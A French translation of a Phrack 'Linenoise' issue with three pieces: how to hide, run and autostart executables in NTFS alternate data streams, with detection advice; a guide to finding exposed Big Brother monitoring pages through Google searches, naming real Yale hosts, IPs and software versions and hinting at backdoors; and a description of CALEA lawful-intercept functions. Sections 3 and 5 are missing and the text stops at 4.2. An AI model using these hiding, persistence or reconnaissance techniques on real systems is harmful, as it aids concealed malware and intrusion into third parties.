==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x03 of 0x10
 

|=-----------------------------------------------------=[ L I N E N O I S E ]=--------------------------------------------------------=|
|=--------------------------------------------=[Traduit par Jacob [Degenere-Science]]=-----------------------------------------------=|
|=--------------------------------------------------------=[ Phrack Staff ]=------------------------------------------------------------=|
 


--[ Table des matières

 
  1 - Le coté obscure de NTFS

  2 - Analysons Big Brother

  3 - Appels gratuits depuis un mobile

  4 - Lawfully Authorized Electronic Surveillance [LAES]

  5 - Java traverse le firewall !

 

--[ 1 - Le coté obscure de NTFS (par H. Carvey)

Introduction

Les plates-formes Microsoft continuent à proliférer et à se multiplier. Les serveurs de bureau et de sociétés fonctionnent sous Windows NT (NT) et Windows 2000 (2k), contrairement aux systèmes des utilisateurs familiaux et des étudiants qui tournent sous Windows XP (XP). Ces plates-formes sont extrêmement populaires, et très répandues. Cependant, les administrateurs et les utilisateurs de ces systèmes en savent très peu sur un dispositif du système de fichier NTFS appelé " Flux de données alternés "(alternate data streams en V.O ,A.D.S)

NTFS est le système de fichier préféré de par sa stabilité, sa fonctionnalité, et le niveau de sécurité qu'il fournit. Les ' flux de données alternés NTFS ' (ADSs) sont fournit pour la compatibilité avec le système de fichier hiérarchique (NDT: initialement " Macintosh Hierarchical File System (HFS) ") de Macintosh, qui utilise les forks(N.D.T :Les fichiers Macintosh sont constitués de deux composantes appelées forks ) ressource pour maintenir une information associé avec un fichier, comme une icône, etc.. (RUSS00). Contrairement a Microsoft qui fournit des moyens pour créer des ADSs spécifique via Windows Explorer, les outils nécessaire et les fonctionnalité pour détecter la présence d'ADSs arbitraires sont absents. Curieusement, les OS ont les fonctionnalité et les outils nécessaires de base pour autoriser un utilisateur a créer des ADSs et pour exécuter du code caché dans ces fluxs. L'article de Microsoft Q101353 reconnaît le fait que les API de base Win32 supportent inconsciemment les ADSs.

Le but de cet article est de décrire en détail comment les ADSs sont créé et manipulé, et comment du code caché dans les ADSs peut être exécuté. Les différence spécifique dans le traitement des ADSs par NT, 2K, XP ne seront pas noté.

 

Création D'ADSs

La syntaxe utilisé pour créer des ADSs est relativement simple. Pour créer un ADS associéavec le fichier " monfichier.txt ", il suffit de séparer le nom par défaut du flux du nom de l'ADS, avec les deux points.

c:\ads>echo Ceci est un ADS > monfichier.txt:hidden

En plus, un ADS peut être créé en utilisant le contenu d'un autre fichier.

c:\ads>echo Ceci est un fichier test > test.txt

c:\ads>type test.txt > monfichier.txt:hidden

Cet ADS peut ensuite être vérifier en utilisant Notepad.

c:\ads>notepad monfichier.txt:hidden

Cependant, aucune des variations de la commande 'dir' ou aucune des configurations de l'explorateur windows ne détecterons la présence de cet nouvel ADS créé.

En plus, des ADSs peuvent êtres créés et associée avec le listing d'un répertoire, plutôt qu'un fichier. Cette particularité prendra plus de signification plus loin dans l'article. Pour le moment, c'est suffisant de décrire comment de tel ADSs peuvent être créé.

c:\ads>echo Cette ADS est associé au listing du répertoire> :hidden

Les ADSs de ce type peuvent être crées avec Notepad et la commande "type", évidemment.

Le contenu des ADSs peuvent ne pas être limités a du simple texte. Quelques chaînes d'informations binaire peuvent constituer un fichier, et l'ADS n'est rien de plus qu'un fichier. N'importe quel exécutable peut être caché dans les ADSs facilement.

c:\ads>type c:\winnt\notepad.exe > monfichier.txt:np.exe

c:\ads>type c:\winnt\system32\sol.exe > monfichier.txt:sol2.exe

De façon similaire, les fichiers images, audio ou autres chaînes de donné peuvent être cachés dans les ADSs

Finalement, Windows Explorer fournit un moyen par lequel des ADSs très spécifique peuvent être créés (RUSS00). Si l'utilisateur ouvre Explorer et choisi un fichier, et ensuite fait un click droit sur ce fichier, un menu déroulant apparaît. En choisissant "Propriété"

apparaîtra un boite de dialogue des propriétés, et en choisissant l'étiquette " Sommaire" (voir figure 1), cela relaiera les champs dans lesquelles l'utilisateur peut insérer des informations.

 
Figure 1 : Sommaire de la boite de dialogue " Propriétés "

 

  Les ADSs n'ont aucun attribut par défaut, intrinsèquement . Les droits d'accès assignés au flux d'accès sans nom par défaut contrôle l'accès pour créer ou voir les ADSs. Plus simplement, si un utilisateur ne peut pas écrire dans un fichier, cet utilisateur ne peut pas ajouter un ADS à ce même fichier. Alors que la protection des fichiers windows ('Windows File protection') prévient le remplacement des fichiers systèmes protégé, il ne prévient pas un utilisateur avec les permission appropriées qui ajoute des ADSs à ces fichiers systèmes. Le 'System File Checker' (sfc.exe) va vérifier que les fichiers systèmes protégé n'ont pas été remplacé, mais ne détectera pas les ADSs.

Les utilisateurs et les administrateurs devraient aussi être au courant de l'article Q319300, qui déclare qu'un serveur d'indexation du contenu Windows 2000 ajoute des flux de données alternés nommé "?Q30lsldxJoudresxAssqpcawXc" aux fichiers images sur les volumes NTFS. Ces ADSs contiennent les onglets de ces images.

Détection, affichage et manipulation des ADSs

 Comme indiqué précédemment, Microsoft ne fournit pas des outils ou des utilitaires (soit directement avec le système d'exploitation soit dans un kit de ressources) pour détecter la présence des ADSs. Un des meilleurs outils disponibles pour cela se nomme lads.exe, écrit par Frank Heyne. Lads.exe est actuellement disponible sous la version 3.01, et fait un excellent travail de rapport des disponibilité des ADSs. Pour les administrateurs travaillant avec des outils graphique, lads.exe est un outil à interface en ligne de commande qui reporte ce qu'il trouve a l'écran. (c'est à dire sur la sortie standard ou STDOUT). La figure 2 montre un exemple de lads.exe en action, qui fonctionne dans un répertoire de test, c:\ads


 FIGURE 2:  LADS Output pour c:\ads


 
La figure 2 montre juste comment on peut employer pleinement lads.exe: Il ne rapporte pas seulement la présence d'ADSs, mais il rapporte aussi le chemin complet et la taille pour chaque ADS. Les notes particulières devraient être prises des trois d'ADSs associés avec monfichier.txt. Deux commençant par un caractère ASCII ne ressemblant pas à grand chose, et le troisième est une longue série de nombre et de lettres entre deux armatures bouclées. Çà, ce sont les ADSs qui sont associés avec le fichier utilisant l'onglet "sommaire" de la boite de le dialogue "propriété" (fig. 1)

Lorsque une ADS est détecté, que pouvons nous faire pour voire son contenue ? Notepad est un utilitaires très maniable pour voir des fichiers, et peut être utilisé pour voir le contenue des ADSs. Cependant, il y a un petit problème. Par exemple, la commande suivante produit un résultat inattendu:

c:\ads>notepad monfichier.txt:hidden

Lorsque cette commande est exécutée, Notepad s'ouvre et demande si l'utilisateur souhaite créer un nouveau fichier. Ceci est une requête peu commune, parce que l'ADS a été créé plus tôt. Pour observer le résultats prévus, entrer la commande suivante:

c:\ads>echo Ceci est un autre ADS > monfichier.txt:caché.txt

c:\ads>notepad monfichier.txt:caché.txt

Le même effet peut être observé lorsque l'ADS est associé avec le listing d'un répertoire, comme dans ":caché.txt". L'addition de l'extension à la fin du nom de fichier autorise l'ADS à être ouvert avec Notepad. Ceci va aussi fonctionner pour les autres ADSs, comme:

c:\ads>notepad monfichier.txt:np.exe

Les ADSs sont des fonctionnalités du système de fichier NTFS, ainsi si un fichier avec un fichier avec un ADS est transféré sur un autre système de fichier, comme FAT, FAT32 ou EXT2; l'ADS est alors enlevé, comme ce n'est pas supporté sur ces autres systèmes de fichiers. Les ADSs sont préservés si le flux sans nom par défaut (c'est à dire: monfichier.txt  des exemples précédents) est copié ou transféré à travers une partition NTFS, ou sur un lecteur NTFS. Ceci peut être accomplit en utilisant la commande 'copy' ou 'move'.

Enlever tous les ADSs d'un flux par défaut est relativement simple, utilisez les commandes suivantes:

c:\ads>type monfichier.txt > monfichier.bat

c:\ads>del monfichier.txt

c:\ads>ren monfichier.bat monfichier.txt

En utilisant LADS, il est facile de vérifier que tout les ADS créés avec les précédents exemples ont disparu.

Exécuter des ADSs

Dans les exemples précédents, les exécutables étaient cachés dans les ADSs. Cette information semble assez inutile à moins que les exécutables eux-mêmes puissent être lancés, sans d'abord devoir les copier hors de l'ADS. En fait, la commande 'start' peut être utilisée pour faire cela. Puisque les exécutables cachés plus tôt ont été supprimés, redémarrez la commande va nous servir d'exemple. Utilisez la commande 'type', cachez Notepad et le Solitaire dans les ADSs associés avec monfichier.txt.

Sur NT, une simple commande va lancer chaque exécutable (MCCL99)

c:\ads>start monfichier.txt:np.exe

c:\ads>start monfichier.txt:sol2.exe

Cependant, ces commandes génèrent une erreur sur Win2k.Si l'on se fie au  message d'erreur, il apparaît que

l'information pointée sur l'exécutable n'est pas suffisante. Par conséquent, chaque chemin relatif ou absolu suffit, et démarrer chacune de ces commande va le démontrer:

c:\ads>start c:\ads\monfichier.txt:np.exe

c:\ads>start .\monfichier.txt:np.exe

Un point intéressant a noter est comment le processus apparaît pendant qu'il démarré. Par exemple, démarrer pslist.exe de SysInternals après l'exécution de chacune des deux commandes citées plus haut, affiche un processus appelé "monfichier.txt" fonctionnant avec un PID de 1512, comme montré dans
la figure 3.

 



Figure 3: Liste des processus en utilisant pslist.exe

 
La figure 4 montre les processus dans l'onglet Processus de Gestionnaire des tâches


Figure 4: Les processus affiché par gestionnaire des tâches sous Win2k


Assez curieusement, l'onglet processus sous 2k montre que le PID 1512 a une image du nom de "monfichier.txt". La figure 5 montre l'onglet Application de Gestionnaire des tâches


Figure 5: L'onglet Applications de gestionnaire des tâches sous 2k

La figure 6 montre que l'onglet des processus du gestionnaire des tâches sous XP s'affiche lorsque la même commande est exécutée sur le système d'exploitation


Figure 6: L'onglet Processus de gestionnaire des tâches sous XP

Finalement, obtenez des informations sur le processus avec listdlls.exe de SysInternals qui va afficher "c:\ads\monfichier.txt:np.exe" comme la ligne de commande pour la commande précédente (voir figure 7), sous XP comme sous 2k.



Figure 7: Résultat de listdlls.exe sur 2k

Une méthode alternative pour lancer des exécutables cachés sous 2k est un raccourci (KASP01). Pour démontrer ce point, créez un raccourci sur le bureau. L'endroit ou le fichier pour ce raccourci est placé est "c:\ads\monfichier.txt". Lorsque le raccourci a était créer, observez l'icône sur le bureau. Supposez que l'ADS pour le solitaire a été créé. Rendez-vous dans les propriétés du raccourci: l'emplacement auquel se réfère le raccourci est "c:\ads\monfichiers.txt:sol2.exe". Attendez quelques secondes et observez les changements sur l'icône. Lancez l'exécutable en double cliquant sur cette icône.

Assez intéressant, une technique similaire fonctionne pour ajouter une entrée dans le dossier démarrer de windows" (KASP01) ou dans le dossier 'run' dans le registre (KASP01). Le chemin complet pour cette clé est:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

Spécifiez le chemin complet pour l'exécutable caché va garantir le lancement de celui ci chaque fois que le système sera démarré.

Maintenant une autre méthode pour lancer un exécutable caché dans les ADSs se fait via la box "démarrage" dans le menue démarrer (KASP01). Cliquez sur le bouton démarrer, ensuite "démarrage", et tapez les commande suivante ce qui aura pour effet de lancer le solitaire ADS:

file:///c:/ads/monfichier.txt:sol2.exe

Pour les administrateur utilisant Perl: Le perl interprète les ADSs assez facilement. Par exemple, les lignes suivantes d'un code Perl peuvent être utilisées pour lancer un ADS:

my $file = 'c:\ads\monfichier.txt:sol2.exe';

`$file`;

Sauvegardez le code précédant dans 'ads.pl' et exécutez le code en tapant:

c:\perl>ads.pl

Il y a une variation intéressante, ainsi la commande suivante fonctionne:

c:\perl>type ads.pl > monfichier.txt:ads.pl

c:\perl>perl monfichier.txt:ads.pl

 The Windows Scripting Host (WSH) a été lancé avec 2k et présente beaucoup de possibilité intéressante en rapport avec les ADSs (KASP01). C'est particulièrement important parce que WSH est natif dans les distribution 2k et XP, alors que Perl doit être installé séparément. Pour démontrer cette capacité de WSH, tapez la commande suivante:

c:\ads>echo MsgBox "VBS file to test ADSs" > ads.vbs

Pour exécuter ce script utilisez WSH; tapez:

c:\ads>wscript ads.vbs

Alternativement, tapez:

c:\ads>cscript ads.vbs

Ou simplement, double cliquez sur le fichier dans l'explorateur windows. Ces trois méthodes vont fonctionner avec les code VBScript. Maintenant tapez les commandes suivantes:

c:\ads>wscript monfichier.txt:ads.vbs

Ou:

c:\ads>start .\monfichier.txt:ads.vbs

Cscript.exe démarre aussi le script. Alternativement, les méthode mentionnées "raccourcit" et box "démarrer" auparavant démarrent le script également (KASP01).

Le vrai, vrai coté obscure

Si le script caché dans un ADS finit avec une extension différente (c'est à dire autre que ".vbs"), WHS aura du mal a reconnaître ce type de fichier, et va se plaindre que quelque chose pour exécuter le fichier n'est pas présent. Par exemple:

c:\ads>type ads.vbs > monfichier.txt:ads.txt

c:\ads>wscript monfichier.txt:ads.txt

L'exécution de la seconde commande va faire une erreur. Cependant, wscript.exe comme cscript.exe permettent a l'administrateur de contrôler l'exécution du programme. La syntaxe de commande peut être vu en tapant:

c:\ads>wscript /?

L'option "//E" autorise l'utilisateur a spécifier un moteur a être utilisé. La nouvelle commande sera:

c:\ads>wscript //E:vbs monfichier.txt:ads.txt

Ceci présente quelques moyens intéressants pour une utilisation malveillante. Par exemple, le dernier exemple d'ADSs produit via Windows Explorer (c'est à dire via l'onglet sommaire dans la boite de dialogue "Propriétés" pour un fichier) produit un ADS avec le nom "?SummaryInformation". Le code, comme un script VBScript, peut être créé et écrit pour un ADS avec le même nom, et ensuite lancé. Le code Perl suivant illustre bien ceci:

my $file = "c:\\ads\\monfichier.txt:".chr(5)."SummaryInformation";

my $src = 'c:\ads\ads.vbs';

`type $src > $file`;

`wscript //E:vbs $file`;

La dernière commande dans le script est intéressante. Pour wscript.exe et cscript.exe, l'option "//E" force l'application à utiliser un moteur de script particulier. Dans ce cas, l'ADS  contenat le script à être lancé n'as pas d'extension, ainsi le scripting host n'a aucun moyen

 de déterminer le moteur de script a être utilisé. Cette exemple pourrait être aussi appliqué aussi facilement aux ADSs créés par le "Content Indexing Server", comme mentionné précédemment.

Conclusion

Les ADSs sont un dispositif du système de fichier NTFS créées pour fournir une compatibilité avec HFS, ce qui pourrait encore être nécessaire pour la compatibilité. Cependant, le manque de visibilité de ce "dispositif" pose un risque pour les administrateurs. Il y a déja eu un virus qui employait les ADSs, W2K. Stream écrit par Bennie et Ratter du group 29A (KASP01). Comme la le nombre d'attaques et d'incidents cybercriminels augmente, l'utilisation malicieuse des ADSs va également augmenter.

La solution n'est pas de stopper l'utilisation du système de fichier NTFS, les bénéfice en sécurité et à l'utilisation sont fabuleux. Ce "dispositif" est resté partie intégrante du système de fichier depuis NT 3.1. Etant donné les circonstances, une solution bien plus prudente aurait été d'inclure le support des fichiers HFS dans le service de fichiers et d'impression pour Macintosh, plutôt que le système de fichier. Ainsi, les administrateurs devraient faire une utilisation judicieuse des "discretionary access control lists (DACLs) sur les fichiers et répertoires (CARV00), et régulièrement scanner leur systèmes critiques en utilisant  des utilitaires comme lads.exe. En complément, Microsoft devrait être apte à détecter et voir les ADSs via Windows Explorer et l'interpréteur de commandes. Une autre mesure appropriée serait de faire apparaître les ADSs dans Windows Explorer par défaut. Par exemple, en utilisant une icône avec un signe "A" signifiant "ADS". En plus, Microsoft devrait fournir des restrictions dans le système d'exploitation pour créer des processus de fichiers exécutables dont les noms contiennent une colonne.

De plus, les vendeurs de logiciels antiviraux devraient inclure le support pour les ADSs dans leur produit, et ceci par défaut. Tandis que beaucoup de vers dans les années passées ou d'autre exécutables, on été écrits en Visual Basic ou en Delphi, d'autres on été fait en Visual Basic scripts. Ce langage à déjà été utilisé pour écrire des malwares entraînants des ravages considérable, et toute les mesures prudentes devraient êtres prises pour protéger les systèmes..

Références

RUSS00 Russinovich, M., Inside Win2K NTFS, Part 2 , Windows 2000 Magazine, Novembre, 2000

MCCL99 McClure, S., Scambray, J., and Kurtz, G., Hacking Exposed: Network Security Secrets and Solutions, Berkeley: Osbourne, 1999

KASP01 Kaspersky, E. and Zenkin, D., NTFS Alternate Data Streams , Windows and .Net Magazine, Spring 2001

CARV00 Carvey, H., Network Trojans: What You REALLY Need To Know , Information Security Bulletin, Vol. 5, Issue 8

 

--[ 2 - Analysons Big Brother

         par da_knight <x667576616a6e@yahoo.com>


    Avez-vous déjà voulu être celui qui espionnait? Si vous êtes un  administrateur système de serveurs UNIX/Linux, il est possible que vous soyez au courant d'un produit appelé Big Brother, qui peut être téléchargé sur'http://bb4.com'.Cet article n'est pas orienté technique, simplement parce qu'il n'a pas besoin de l'être. Ce dernier est divisé en deux sections,donc soutenez moi pour le briefing sur Big Brother (BB).

    BB est un programme qui va afficher les divers équipements d'un ordinateur, comme les moniteurs connectés, l'utilisation du cpu, l'usage du
disque, le statut ftp, le statut http, le statut pop3, etc.. Comme vous pouvez l'imaginer, cette information est très importante pour une organisation. BB est votre installation standard client/serveur. Le logiciel serveur peu fonctionner sous différents UNIX, linux et NT. Le logiciel client est
disponible pour UNIX, Linux, NT, Novell, AS/400, et VAXEN, et quelques logiciels clients sont fournis par des vendeurs 3rd-party et ne sont pas supportés par la technologie BB4.

    Ce qui est cool avec tout çà c'est que toutes ces informations sont visibles sur une page web. Donc, si vous avez des serveurs multiples que
vous avez à maintenir, avec ce produit vous serez capable d'aller sur une page web et rapidement visionner un statut de tout ces serveurs. - joliment
maniable. Quand tout est OK votre statut est " vert ", les gros problèmes sont indiqués en " rouge ".

    Exemple : Le statut de connectivité (conn) est donné en pingant l'équipement en question, si le ping ne fonctionne pas, il apparaîtra une
zone rouge sur la page web. Lorsque les tests repèrent ce dysfonctionnement, BB peut être configuré pour automatiquement avertir l'administrateur
(N.D.T:par mail ou autre).

Ici se trouve un menu reprenant les statut, listés selon la sévérité :

rouge  - Ennuis; vous avez des problèmes
violet - Pas de rapport; le client n'as pas répondu dans les dernières
30 minutes.
jaune  - Attention; un seuil a été franchit.
vert   - OK; tout va bien.
rien   - Non disponible; Le test a été éteint.
bleu   - Désactivé; la notification pour ce test a été désactivée.

     Le statut est aussi reflété dans le titre de la page web, ainsi il prend seulement une zone rouge pour faire commencer le titre de page Web par "red:Bigs Brother"; nous allons nous plonger dans cela dans une minute.

     Une chose courante que font les administrateurs est de monitorer leurs systèmes les plus importants avec ce produit, aussi bien que les aspects
le plus importants de leurs systèmes. Si vous avez un serveur web, vous voudrez peut être monitorer le statut de connexion et http, juste pour
être sur que les personnes sont bien apte à se connecter au serveur. Les autres tests que j'ai pu voir étaient pour vérifier Oracle, ou pour
lister tous les utiliasteurs connectés. Diable, ils ont même une manière d'ajouter des rapports sur la météo. Le point à noter c'est que Vous
pouvez surveillez pratiquement sans limite, le point important, cela dépend juste de ce que vous considérez important.

     Maintenant que vous avez un peu plus de connaissances sur ce que BB est capable de faire, je veux citer deux choses de la FAQ de BB4 Technologies
 (BB4) - Section 5: Security Consideration (http://bb4.com/bb/help/bb-faq.html#5.0).
Tout dans cette section de la FAQ devrait être considéré, mais focalisons-nous sur ces deux-là.
 
     "BB n'as pas besoin d'être lancé en tant que root. Nous vous suggérons de créer un utilisateur 'BB' et de lancer bb avec cet utilisateur". " Nous
vous recommandons la protection par mot de passe pour les pages web de Big Brother."
 
     Donc, vous devez vous demandez pourquoi ces deux choses sont importantes pour moi ? Bien, un, vous savez que les administrateurs qui lancent ce logiciel l'ont probablement installé en utilisant l'utilisateur 'bb', et qu'il peut aussi être démarré avec les privilèges root. Cela vous donne un compte valide d'utilisateur sur un système, et ce compte n'est probablement pas utilisé par une personne très qualifiée donc le mot de passe peut être très simple. Mais ce n'est pas le sujet de cet article. La seconde chose, c'est que les informations récoltées par BB4 et placées sur ces pages web sont extrêmement importantes, et elles recommandent la protection par mot de passe. Suivant cette logique vous allez me dire que ces pages webs,  fonctionnent sur un serveur web, et si elles ne sont pas protégées par mot de passe, et si le serveur est visible sur le www....ensuite.... Oui, les moteurs de recherches vont trouver ces pages et vous les montrer lorsque vous savez ce que vous cherchez.

     Qu'attendez vous ? rendez vous sur 'http://www.google.com' et cherchez avec les mots clés "green:Big Brother" (en incluant les ", qui peuvent
affiner la recherche).Vous allez avoir environ 16,200 réponses. Maintenant cela ne signifie pas qu'elles sont toutes uniques: En effet, il y aura des
numéros de pages provenant du même site, mais vous obtenez la principale. J'estimerais qu'il y a environ 200 sites qui peuvent être repérés par
cette astuce. Essayez de chercher avec tous les autres statut, vous n'avez qu'a changer le nom de la couleur. Une autre chose: Je choisis google pour une bonne raison: Beaucoup de ces sites ne fonctionnent plus avec les produit BB, mais google possède une belle capacité à voir les pages cachées, ainsi vous pouvez encore glaner de celles-ci quelques informations. Apres que vous ayez trouvé votre liste de sites, vous réalisez que la majorité d'
entre eux sont soit de petits ISP ou des universités. Je vais choisir une université une de Ivy League one, pas moins. Je peux vous dire que
ce site BB en particulier fonctionne sur un serveur BB du nom de artemis.cs.yale.edu' et l'adresse IP est '128.36.232.57'. L'ordinateur
'rhino.zoo.cs.yale.edu' a également quelques problèmes sérieux. Comment j'ai fait pour trouver l'adresse IP ? Simple. Si vous cliquer sur le
bouton "green"  (vert) ou sur un bouton d'une autre couleur sous la colonne "conn", vous allez voir une page web qui a une information similaire à çà:
---------------------------------------------------------

rhino.zoo.cs.yale.edu - conn

---------------------------------------------------------
 
green Sun Jun 30 01:33:15 EDT 2002 Connection OK  PING 128.36.232.12
(128.36.232.12) from 128.36.232.57 : 56(84) bytes of data. 64 bytes
from 128.36.232.12: icmp_seq=0 ttl=255 time=379 usec

--- 128.36.232.12 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss round-trip
min/avg/max/mdev = 0.379/0.379/0.379/0.000 ms

---------------------------------------------------------
     Ok vous savez que la commande ping a essayé de pinger '128.36.232.12' dans ce cas 'rhino.zoo.cs.yale' provient de '128.36.232.57' ou de
'artemis.cs.yale.edu'. Voyons ce que nous pouvons trouver.

     Je peux voir que presque tout leurs serveurs font tourner Tripwire, donc ils ont des systèmes UNIX, et vous allez probablement vouloir créer
une backdoor sur ce système. Sur une autre page, nous pouvons voir les utilisateurs qui sont loggués actuellement. Actuellement, nous avons 33
utilisateurs loggués, et nous voyons cela a 1h33 du mat !, ainsi on peut penser que certaines personnes ont laisse leur ordinateur loggué.

     Je veux obtenir plus d'informations sur les serveurs Yale, ainsi allons sur google et faisons une recherche pour un autre page de Yale, mais cette fois regardons pour 'zelda.cs.yale.edu'. Maintenant nous pouvons obtenir de bonnes informations. Lorsque ce site est affiché, vous allez
voir quelques serveurs, énumérés comme plusieurs départements. Si vous souhaitez savoir quel logiciel 'plucky.cs.yale.edu' utilise pour faire fonctionner ses services HTTP, cliquez simplement sur le bouton green' (vert):

----------------------------------------------------

plucky.cs.yale.edu - http

----------------------------------------------------
 
green Sun Jun 30 01:45:21 EDT 2002


 http://plucky.cs.yale.edu - Server OK
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: http://plucky.cs.yale.edu/index.html Date: Sun, 30
Jun 2002 05:45:21 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 12 Jan 1999 20:49:40 GMT ETag:
"54b4ec126d3ebe1:4051"
Content-Length: 2226


Seconds: 0.01

----------------------------------------------------

     Diable, ils tournent actuellement sous IIS 4.0 ? Ils ne savent donc pas à quel point ils sont insécurisés ? Je m'éloigne là. A partir de cette
informations vous savez que le serveur est l'une des versions de Windows NT qu'il fait tourner IIS 4.0.

     Zelda montre aussi qu'il monitorent les imprimantes. Maintenant, ce qui peut être fun; vous pouvez par exemple envoyer le message 'je pense
vous avoir hacké' à l'imprimante'philo-printer.philosophy.yale.edu'. Et au cas où vous vous demanderiez, l'imprimante est une 'HP LaserJet 4050
Series'; J'ai juste à cliquer sur le bouton en dessous de la colonne "printer" (imprimante) pour le savoir.

     Ailleurs sur ce même site, je trouve que plusieurs serveurs font tourner telnet, pop3,oracle,ftp, et imap. Plusieurs de ces services vont gentiment
vous donner la version du logiciel qui les font tourner. Oracle par exemple, est assez gentil pour vous montrer tout les utilisateurs connectés .Comment
pouvez-vous les remercier pour cette information valable?

     Aussi, il semble également que les géologistes de Yale semblent posséder des données de grandes importances. Je ne pouvais pas regarder ce qu'ils surveillent en raison des autorisations d'accès sur leur site Web, mais je sais que leur serveur web tourne sur Apache 1.3.26.

     Comme vous pouvez le voir, j'aurais été capable d'obtenir un énorme quantité de données vitales en quelques minutes. En plus, je n'ai violé
aucunes lois. Ces pages webs sont postées de telle façon que le monde entier peut les voir. En seulement 10 minutes ou plus pour découvrir quelque chose sur un système particulier, mais dans ce laps de temps j'ai trouvé de nombreuse choses sur 40 systèmes de la même organisation ! Merci Big Brother !

     Je pense qu'il doit être mentionné que l'information trouvée sur ces pages web est une information que la plupart des organismes ne laissent même pas aux des employés, en dehors du département IT . Je devine que je devrais me sentir spécial puisque Yale doit estimer que je ne suis pas un
risque pour leur sécurité, autrement ils m'auraient incité à m'authentifier sur le site web.

Imaginez cela: un ISP qui liste tous ses routeurs avec leur IPs et les informations relatifs à l'architecture. Si vous obtenez çà, vous pourriez probablement compter sur des vulnérabilités (découvertes cette année) dans SNMP ou mieux, compter sur les comptes/mot de passes par défaut dans ce type de dispositif. J'apporte seulement ceci parce que je sais que j'ai trouvé un ISP qui liste les routeurs et la majorité des sites retournés par
google semblent être de petits ISP.

A propos de la recherche avec google, je vous recommande de chercher avec "red:Big Brother", parce que ces pages vous donneront toujours plus
d'informations que lorsque le système fonctionne parfaitement.

Finalement, je n'ai pas écrit cet article pour vous inciter à pénétrer des systèmes, ni pour vous fournir des moyens pour arriver au vos fins. J'ai écrit cela parce que la sécurité est extrêmement importante, avec l'information trouvée ,parce qu'avec ce produit votre environnement peut être compromis. Si vous êtes un administrateur système pour un site pouvant être révélé sur google, vous devriez sécuriser vos pages webs BB, parce que à l'heure actuelle, le monde entier est en mesure de connaître votre infrastructure.
 

--[ 4 - Introduction a la Surveillance Electronique Authorisee par la Loi. (Traduit par DecereBrain)
[LAES : Lawfully Authorized Electronic Surveillance]

by Mystic <mystic@lostways.net>

En 1994 le Congres a adopte le Communications Assistance for Law Enforcement Act (CALEA) [Loi d'Assistance aux Communication pour le
Maintient de l'Ordre]. Son intention etait de preserver mais ne pas etendre les possibilites d'ecoutes de fils des agences de maintient de l'ordre par requeter les fournisseurs de telecomunications d'utiliser des systemes qui permettraient aux agences gouvernementales un niveau d'acces basique dans un but de surveillance. Quoiqu'il en soit, la loi ne preservait pas seulement les possibilites deja existantes d'enregistrer les commnications, elle les augmente, autorisant le gouvernement a collecter des informations a propos des appelant par sans fil, enregister le contenu sans fil, les messages textes et les communications par paquets. Le standard qui a resulte de cette legislation est appele Lawfully Authorized Electronic Surveillance ou LAES.

Un Fournisseur de Service de Telecommunications (FST) qui est compatible CALEA fournit les moyens acces aux services et informations
suivants aux Agences de Maintient de l'Ordre [Law Enforcement Agencies: LEA] :

1. Non-call associated : Information a propos de l'interception du sujet qui n'est pas necessairement en lien avec un appel.

2. Call associated : Information d'identification de l'appellant a propos des appels impliquant l'interception du sujet.

3. Information de signal Call associated et non-call associated :Signale l'information initialisee par le sujet ou le reseau.

4. Contenu de la surveillance : la capacite de monitorer les communications du sujet.

Ce processus est appele la fonction d'interception. La fonction d'interception est completee de 5 fonction separees : acces,
delivrance, collection, administration de fournisseur de service, et administration de maintient de l'ordre.

----[ 4.1 La Fonction d'Acces (FA)

La FA est constituee d'un ou plus Point d'Acces d'Interception [NDT : PAI, ou IAP en VO] qui isolent les communications du sujet ou
les informations d'identification de l'appel sans obstruction. Il y a plusieurs IAP differants qui peuvent etre utilises dans la fonction
d'interception. Je les ai separes en IAP Call associanted et Non-call associated, et IAP de Surveillance ce contenu.

IAP d'information Call Associated et Non-call Associated
--------------------------------------------------------

- IAP de Service du Systeme (SSIAP) : donne des informations non-call associated.

- IAP d'Information d'Identification d'Appel (IDIAP) : donne des informations call associated et, sous forme identique a ce qui suit, les evenements d'appel pour des appels de circuits basiques :

Reponse - Une partie a repondu a une tentative d'appel
Change - l'identite ou les identites d'un appel ont change
Origine - Le systeme a route un appel passe par le sujet ou le systeme a traduit un appel pour le sujet
Redirection - Un appel a ete redirige (i.e., forwarde, detourne, ou devie)
Liberation - Les facilites pour l'appel entier ont ete liberees
TerminationAttempt - Une tentative d'appel a un sujet d'interception a ete detecte.

- IAP de Signal de Sujet d'Interception (ISSIAP) : fournit l'acces aux informations d'appel et de signalement initailises par le sujet. Ceci inclut, si le sujet d'interception utilise le forwarding d'appels, l'attente d'appel, le maintient d'appel ou l'appel a trois. Ca donne egalement aux LEA la possibilite de recevoir les digits composes par le sujet.

- IAP de Signalement de Reseau (NSIAP) : Permet aux LEA d'etre informees sur les mesages du reseau qui sont envoyes au sujet d'interception. Ces messages incluent les informations occupe, re-ordre, sonnerie, alerte, tonalite d'attente de message ou indication visuelle, attente d'appel, information d'appel ou nom/numero de redirection, et le texte affiche.

IAPs de Surveillance de Contenu
-------------------------------

Ce qui suit sont les IAPs de surveillance de contenu qui transmettent du contenu en utilisant un CCC ou un CDC. Une remarque
interessante a propos de la surveillance de contenu est que les TSPs ne sont pas responsables du decryptage d'informations qui est cryptee
par le sujet de l'interception a moins que les donees soit cryptees par le TSP et que le TSP a le moyen de les decrypter.

- IAP de Circuit (CIAP) : accede au contenu de l'appel des communications du mode circuit.

- IAP de Circuit de Conferance (CCIAP) : Fournit l'acces au contenu de services d'appel en conferance inities par le sujet comme les appels a trois et les appels a multiples voies.

- IAP de donnees par paquets (PDIAP) : Fournit l'acces aux paquets de donnees envoyes ou recus par le sujet de l'interception.

Ceux-ci incluent les services suivants :

Signal ISDN d'utilisateur a utilisateur
Services de paquets X.25 ISDN D-channel
Short Messages Services (SMS) pour les cellulaires et les services de donnees en mode paquet Personal Communication Services Wireless (i.e. Cellular Digital Paquet Data (CDPD), CDMA, TDMA, PCS1900, ou les services de donnees en mode paquet bases sur le GSM)
Les services X.25
Les services TCP/IP
Paging (une voie ou deux voies)
Les services de donnees en mode paquet utilisant les canaux de circulation

----[ 4.2 La Fonction de Delivrance (DF)

